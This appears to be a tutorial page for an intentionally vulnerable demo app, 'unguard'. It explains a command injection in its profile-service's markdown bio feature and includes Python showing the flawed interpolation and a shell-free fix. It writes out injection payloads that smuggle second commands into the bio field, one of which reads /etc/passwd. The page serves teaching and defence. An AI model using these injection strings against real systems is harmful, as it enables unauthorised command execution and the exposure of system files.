Command injection (sometimes CMD injection) is an attack that executes arbitrary commands on the host operating system. Typically this is possible because user input is not sufficiently validated or escaped before it is placed into a command line.
When a bio string is posted with markdown enabled, the profile-service uses a shell program called `markdown` to do the markdown-to-HTML conversion, but does not properly escape the user input before inserting it into the command line. This makes it possible to execute arbitrary shell commands.
For this exploit to work you need:
- unguard deployed and running
To exploit the command injection vulnerability in the profile-service, log in, go to your own profile and set a bio string that contains additional commands, with the "Enable markdown" checkbox checked.
Without the CLI, you can simply craft your own payload:
Posting the following bio will execute `tail -n 1 /etc/passwd`, pass its output through the markdown-to-HTML conversion and write the result into your bio:

```
' & tail -n 1 '/etc/passwd
```
Sending that request results in a command similar to the following being executed on the proxy-service:

```
/bin/sh -c echo '' & tail -n 1 '/etc/passwd' | markdown
```
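As an added illustration (not code from unguard itself), the Python below reproduces how the unescaped interpolation splits the command line the way a POSIX shell would, and shows the shell-free fix: exec the converter directly and pass the bio on stdin. The `markdown` binary is assumed to read stdin; `cat` stands in for it so the example runs anywhere.

```python
import shlex
import subprocess

# Constructed payload, the same bio string the page shows.
PAYLOAD = "' & tail -n 1 '/etc/passwd"


def vulnerable_command(bio: str) -> str:
    """String the service hands to /bin/sh -c: the bio is pasted in unescaped,
    so a quote inside it ends echo's argument and '&' starts a second command."""
    return f"echo '{bio}' | markdown"


def quoted_command(bio: str) -> str:
    """Partial fix: shell-quote the bio so it stays a single echo argument."""
    return f"echo {shlex.quote(bio)} | markdown"


def shell_words(cmd: str) -> list:
    """Tokenise a command line the way a POSIX shell would (nothing is executed)."""
    return shlex.split(cmd)


def safe_render(bio: str, converter=("markdown",)) -> str:
    """Proper fix: no shell at all. The converter is exec'd directly and the bio
    arrives on stdin, so nothing in it can become part of the command line."""
    result = subprocess.run(list(converter), input=bio,
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    # 'tail' appears as its own command word in the vulnerable form.
    print(shell_words(vulnerable_command(PAYLOAD)))
    # With quoting, the whole bio is one argument to echo.
    print(shell_words(quoted_command(PAYLOAD)))
    # Without a shell the payload is just text on stdin (cat stands in for markdown).
    print(safe_render(PAYLOAD, converter=("cat",)))
```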
Writing Linux kernel information into your bio:

```
' & uname '-a
```